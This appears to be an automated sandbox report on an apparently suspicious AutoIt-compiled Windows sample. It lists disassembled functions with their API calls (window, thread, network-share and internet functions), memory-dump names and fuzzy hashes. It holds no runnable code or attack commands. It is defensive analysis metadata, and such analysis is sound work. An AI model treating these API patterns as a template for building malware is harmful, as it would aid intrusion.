                            Function 000BC066 Relevance: 6.0, APIs: 4, Instructions: 20synchronizationCOMMON
                            Download Yara Rule
                            APIs
                            • WaitForSingleObject.KERNEL32(?,000000FF), ref: 000BC071
                            • UnloadUserProfile.USERENV(?,?), ref: 000BC07D
                            • CloseHandle.KERNEL32(?), ref: 000BC086
                            • CloseHandle.KERNEL32(?), ref: 000BC08E
                              • Part of subcall function 000BB850: GetProcessHeap.KERNEL32(00000000,?,000BB574), ref: 000BB857
                              • Part of subcall function 000BB850: HeapFree.KERNEL32(00000000), ref: 000BB85E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                            • String ID:
                            • API String ID: 146765662-0
                            • Opcode ID: 551d8384cbf42d3108e97012af61a18d95238c0993da5fbbcfc1b26edb82e218
                            • Instruction ID: 8157a4364de900c52b9e7fd9b7bfc566943d38540d05b485139172046e64e195
                            • Opcode Fuzzy Hash: 551d8384cbf42d3108e97012af61a18d95238c0993da5fbbcfc1b26edb82e218
                            • Instruction Fuzzy Hash: 28E0B63610400ABFCB012FE5ED09859FB2AFF993213108225F66581970CFB2A8B1EB90
                            Function 000FC0A0 Relevance: 6.0, APIs: 4, Instructions: 20COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CapsDesktopDeviceReleaseWindow
                            • String ID:
                            • API String ID: 2889604237-0
                            • Opcode ID: df7428629b4577b16f4815b16198c5d36e8a20e8fb75de9adae7e1483de06d78
                            • Instruction ID: b6388dff12fca93bedd292d7d1d702daa6c9b1bac32a7370f5aaa80e077def29
                            • Opcode Fuzzy Hash: df7428629b4577b16f4815b16198c5d36e8a20e8fb75de9adae7e1483de06d78
                            • Instruction Fuzzy Hash: A7E04FB1500204EFEB105FB0EC48A6D3FB9EB4C350F118405FD8A87611DAB698C19B00
                            Function 000FC0B4 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                            Download Yara Rule
                            APIs
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: CapsDesktopDeviceReleaseWindow
                            • String ID:
                            • API String ID: 2889604237-0
                            • Opcode ID: 35be4743cbd90c45b998b3b953288c5d0b5dad472ebcb48a13844e5e5e58bd47
                            • Instruction ID: b1c830b5fc5e0f6d15bc25ed56cdbc80c749f247715887ddd62dbae463a03238
                            • Opcode Fuzzy Hash: 35be4743cbd90c45b998b3b953288c5d0b5dad472ebcb48a13844e5e5e58bd47
                            • Instruction Fuzzy Hash: F3E046B1500200EFDF00AFB0EC4866E3FA9EB4C360F118405F98A8B611DBBA99C09B00
                            Function 000A4C3D Relevance: 6.0, APIs: 4, Instructions: 14threadCOMMON
                            Download Yara Rule
                            APIs
                            • __getptd_noexit.LIBCMT ref: 000A4C3E
                              • Part of subcall function 000A86B5: GetLastError.KERNEL32(?,000A0127,000A88A3,000A4673,?,?,000A0127,?,0008125D,00000058,?,?), ref: 000A86B7
                              • Part of subcall function 000A86B5: __calloc_crt.LIBCMT ref: 000A86D8
                              • Part of subcall function 000A86B5: GetCurrentThreadId.KERNEL32 ref: 000A8701
                              • Part of subcall function 000A86B5: SetLastError.KERNEL32(00000000,000A0127,000A88A3,000A4673,?,?,000A0127,?,0008125D,00000058,?,?), ref: 000A8719
                            • CloseHandle.KERNEL32(?,?,000A4C1D), ref: 000A4C52
                            • __freeptd.LIBCMT ref: 000A4C59
                            • ExitThread.KERNEL32 ref: 000A4C61
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ErrorLastThread$CloseCurrentExitHandle__calloc_crt__freeptd__getptd_noexit
                            • String ID:
                            • API String ID: 408300095-0
                            • Opcode ID: 1b93c01bb4220397a1c29fea2f8d2704020a02b6a0c4afe6515bd4e0f6854038
                            • Instruction ID: ced1b3adfc93c69dfbcbfcdf6b4c0d6e65333fd972dcfad5ddbf64224b9ef2d9
                            • Opcode Fuzzy Hash: 1b93c01bb4220397a1c29fea2f8d2704020a02b6a0c4afe6515bd4e0f6854038
                            • Instruction Fuzzy Hash: EAD0A731443A514BD17527E09D0D68D32905F03B35F018314E079454E19FA068414792
                            Function 00102350 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 475COMMON
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: _memmove
                            • String ID: >$DEFINE
                            • API String ID: 4104443479-1664449232
                            • Opcode ID: 33fa3399901376171375e516a56b59fc8ca65ede16beefa3d650e9ae805c28e0
                            • Instruction ID: fe55606b5d6dee0137793dc61f792b4e36af184c7a30d157fcffe7558ecaffff
                            • Opcode Fuzzy Hash: 33fa3399901376171375e516a56b59fc8ca65ede16beefa3d650e9ae805c28e0
                            • Instruction Fuzzy Hash: 32127C71A0020ADFCF24DF98C4946ADB7B1FF58310F25825AE899AB395D770ED81CB50
                            Function 000BEAD5 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 240comCOMMON
                            Download Yara Rule
                            APIs
                            • OleSetContainedObject.OLE32(?,00000001), ref: 000BECA0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: ContainedObject
                            • String ID: AutoIt3GUI$Container
                            • API String ID: 3565006973-3941886329
                            • Opcode ID: 8f580872c2468715bf777299a72482a65eaf3fa196b2e5063e468c2a35b7b310
                            • Instruction ID: 2ccd07d4ec2d2c0576d57b05f3f7411fdfac47477d66d2222af728064a57f4e1
                            • Opcode Fuzzy Hash: 8f580872c2468715bf777299a72482a65eaf3fa196b2e5063e468c2a35b7b310
                            • Instruction Fuzzy Hash: 62913674600701AFDB54DF64C884BAABBF9BF49710F24856DE94ADB291DBB0E841CB60
                            Function 000CE704 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 200shareCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 00083BCF: _wcscpy.LIBCMT ref: 00083BF2
                              • Part of subcall function 000884A6: __swprintf.LIBCMT ref: 000884E5
                              • Part of subcall function 000884A6: __itow.LIBCMT ref: 00088519
                            • __wcsnicmp.LIBCMT ref: 000CE785
                            • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 000CE84E
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
                            • String ID: LPT
                            • API String ID: 3222508074-1350329615
                            • Opcode ID: 7a304c0e0896652e1abf084c8ab3556235e0d9fc0d88519a63fe1a1efbaf933c
                            • Instruction ID: a90e9e04d74ce560ab874f54e153720747bc9f671b4ce62583d99c6934b6c7f5
                            • Opcode Fuzzy Hash: 7a304c0e0896652e1abf084c8ab3556235e0d9fc0d88519a63fe1a1efbaf933c
                            • Instruction Fuzzy Hash: 97616E75A00215AFDB14EB94C895FEEB7F4EF09310F14816DF54AAB291DB70AE44CB50
                            Function 00081B72 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 143sleepCOMMON
                            Download Yara Rule
                            APIs
                            • Sleep.KERNEL32(00000000), ref: 00081B83
                            • GlobalMemoryStatusEx.KERNEL32 ref: 00081B9C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: GlobalMemorySleepStatus
                            • String ID: @
                            • API String ID: 2783356886-2766056989
                            • Opcode ID: 065dd0f059d922b8e45efca3a1aceea9f578c23e0a44fc1d888031550399c11c
                            • Instruction ID: b49c32a1c8f6be249de04a2c4f0ecfa3abd85946fa9db6aeba5477a66f5a296d
                            • Opcode Fuzzy Hash: 065dd0f059d922b8e45efca3a1aceea9f578c23e0a44fc1d888031550399c11c
                            • Instruction Fuzzy Hash: 34514771409744ABEB20AF14D886BABBBECFF99354F41484DF1C8410A6EB7195ACC762
                            Function 000CCE59 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0008417D: __fread_nolock.LIBCMT ref: 0008419B
                            • _wcscmp.LIBCMT ref: 000CCF49
                            • _wcscmp.LIBCMT ref: 000CCF5C
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: _wcscmp$__fread_nolock
                            • String ID: FILE
                            • API String ID: 4029003684-3121273764
                            • Opcode ID: f9589f2cc2f5ddd747d3998df9b26c40f5fddf832462d4cd933a6c1a90aa948c
                            • Instruction ID: 64207e04414deb1a2055d79926ab04fee2711a661c7ed265e1f4987a31622216
                            • Opcode Fuzzy Hash: f9589f2cc2f5ddd747d3998df9b26c40f5fddf832462d4cd933a6c1a90aa948c
                            • Instruction Fuzzy Hash: C741C632A0421ABAEF20EBA4CC45FEF7BB9AF49714F00046DF505EB196DB719A458750
                            Function 000EA578 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(?,00001132,00000000,?), ref: 000EA668
                            • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 000EA67D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessageSend
                            • String ID: '
                            • API String ID: 3850602802-1997036262
                            • Opcode ID: eea9f1df5779c6f0cf7ea5767724ce23c10f0d46e5e9808257892ab18db5e5dc
                            • Instruction ID: 1638fd3cd12266e7521b7ba4e67689a8060e24bd4eef443fe404b0fa1976e1ef
                            • Opcode Fuzzy Hash: eea9f1df5779c6f0cf7ea5767724ce23c10f0d46e5e9808257892ab18db5e5dc
                            • Instruction Fuzzy Hash: F2410775B00249AFDB54CFA9C880BDA7BB5FB0A300F14046AE915AB351D771A945CFA1
                            Function 000E9567 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON
                            Download Yara Rule
                            APIs
                            • DestroyWindow.USER32(?,?,?,?), ref: 000E961B
                            • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 000E9657
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Window$DestroyMove
                            • String ID: static
                            • API String ID: 2139405536-2160076837
                            • Opcode ID: 8b5dbd36a3e9a5de39fd83dcf952d090e183f10e4b694f08bca75625080381a8
                            • Instruction ID: 7cf8bdedc52248341639e38d9ada255cc834141360ec04c0ee35954fda43616b
                            • Opcode Fuzzy Hash: 8b5dbd36a3e9a5de39fd83dcf952d090e183f10e4b694f08bca75625080381a8
                            • Instruction Fuzzy Hash: 4B319C32500644AEEB109F65DC80FFB77A9FF48764F00861AF8A9D71A1CA71AD81DB60
                            Function 000C5B75 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 87windowCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 000C5BE4
                            • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 000C5C1F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: InfoItemMenu_memset
                            • String ID: 0
                            • API String ID: 2223754486-4108050209
                            • Opcode ID: f22c7e7b6e11b320cd81a0396dc5785a1bd767a3c4bcdca6b563e1c2e38ef070
                            • Instruction ID: 274cfc3e505d5e54a03e26ba7db68aaa17f687850d7d4022b5f5db2637f87ba8
                            • Opcode Fuzzy Hash: f22c7e7b6e11b320cd81a0396dc5785a1bd767a3c4bcdca6b563e1c2e38ef070
                            • Instruction Fuzzy Hash: E5318039600709AFDB648F98DDC5FAEBBF4AF05391F18001DE981961A1E7B0AAC4DF10
                            Function 000D6B60 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 83COMMON
                            Download Yara Rule
                            APIs
                            • __snwprintf.LIBCMT ref: 000D6BDD
                              • Part of subcall function 0008CAEE: _memmove.LIBCMT ref: 0008CB2F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: __snwprintf_memmove
                            • String ID: , $$AUTOITCALLVARIABLE%d
                            • API String ID: 3506404897-2584243854
                            • Opcode ID: 551e15710e53bbd3aa828ff8d82274333131569180fea10c923091945d98712d
                            • Instruction ID: 5fca1183b7d455584fe0a93197c991abfa18f92379018aaecded63b79f63efbc
                            • Opcode Fuzzy Hash: 551e15710e53bbd3aa828ff8d82274333131569180fea10c923091945d98712d
                            • Instruction Fuzzy Hash: E4216F31600218AACF14EFA4CC82EEE77B5FF45700F40446AF586A7282DB75EA45CBB5
                            Function 000E91DC Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                            Download Yara Rule
                            APIs
                            • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 000E9269
                            • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 000E9274
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: MessageSend
                            • String ID: Combobox
                            • API String ID: 3850602802-2096851135
                            • Opcode ID: dd38177e61ed5244db1b5f85b61f8d4874c5415095920f087d50149385a2c738
                            • Instruction ID: 3a201aa6874c62ee4b2d82a846f4ad80a43855d486d2c37122f5687e4729d814
                            • Opcode Fuzzy Hash: dd38177e61ed5244db1b5f85b61f8d4874c5415095920f087d50149385a2c738
                            • Instruction Fuzzy Hash: 3711EB71700149BFEF65CF55DC80EFB379AEB893A4F104129FA18A7290D671DC5187A0
                            Function 000E970B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0009C619: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0009C657
                              • Part of subcall function 0009C619: GetStockObject.GDI32(00000011), ref: 0009C66B
                              • Part of subcall function 0009C619: SendMessageW.USER32(00000000,00000030,00000000), ref: 0009C675
                            • GetWindowRect.USER32(00000000,?), ref: 000E9775
                            • GetSysColor.USER32(00000012), ref: 000E978F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: Window$ColorCreateMessageObjectRectSendStock
                            • String ID: static
                            • API String ID: 1983116058-2160076837
                            • Opcode ID: cbbfb5d88bb5e535d106ec0f76dc8953554600c606aa6700aa78d13a569f05fd
                            • Instruction ID: 5c49c74ac1306d48dd1310c9015730c11f075107dee347bd3a2d67b33149f85a
                            • Opcode Fuzzy Hash: cbbfb5d88bb5e535d106ec0f76dc8953554600c606aa6700aa78d13a569f05fd
                            • Instruction Fuzzy Hash: 32115672620209AFDB04DFB8DC45EEE7BB8EB08344F000528F996E3241E775E891DB50
                            Function 000E9424 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetWindowTextLengthW.USER32(00000000), ref: 000E94A6
                            • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 000E94B5
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: LengthMessageSendTextWindow
                            • String ID: edit
                            • API String ID: 2978978980-2167791130
                            • Opcode ID: b2cb78cc17912c0329056ee7af7c102db7cea69a05479fd837b242d551183691
                            • Instruction ID: 44962679160fe8a3f2c92dd039667feea081f6668bdd103c0267eea1bfe0531a
                            • Opcode Fuzzy Hash: b2cb78cc17912c0329056ee7af7c102db7cea69a05479fd837b242d551183691
                            • Instruction Fuzzy Hash: 2B118FB1100248AFEF508EA5EC40EEB37A9EF05374F504724F965A31E0C771DC929B60
                            Function 000C5C80 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62windowCOMMON
                            Download Yara Rule
                            APIs
                            • _memset.LIBCMT ref: 000C5CF3
                            • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 000C5D12
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089905761.000000000013A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089922806.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_80000_r3T-ENQ-O-2024-10856.jbxd
                            Similarity
                            • API ID: InfoItemMenu_memset
                            • String ID: 0
                            • API String ID: 2223754486-4108050209
                            • Opcode ID: 74d735ed13993ee87736a86b83887b6b60fb3279cf5dd768f363f8688a8b6d8d
                            • Instruction ID: d1dfc84456588fba1e233638ca19cc86a1dceeebb17dedd2e1c608217a064309
                            • Opcode Fuzzy Hash: 74d735ed13993ee87736a86b83887b6b60fb3279cf5dd768f363f8688a8b6d8d
                            • Instruction Fuzzy Hash: 8411817A901618ABDB70DB58DC48F9D77F99B06356F180029ED42EB1A1D370BD84C791
                            Function 000D53F6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 61networkCOMMON
                            Download Yara Rule
                            APIs
                            • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 000D544C
                            • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 000D5475
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2089799408.0000000000081000.00000020.00000001.01000000.00000003.sdmp, Offset: 00080000, based on PE: true
                            • Associated: 00000000.00000002.2089767327.0000000000080000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2089861229.000000000010D000.00000002.00000001.01000000.00000003.sdmpDownload File
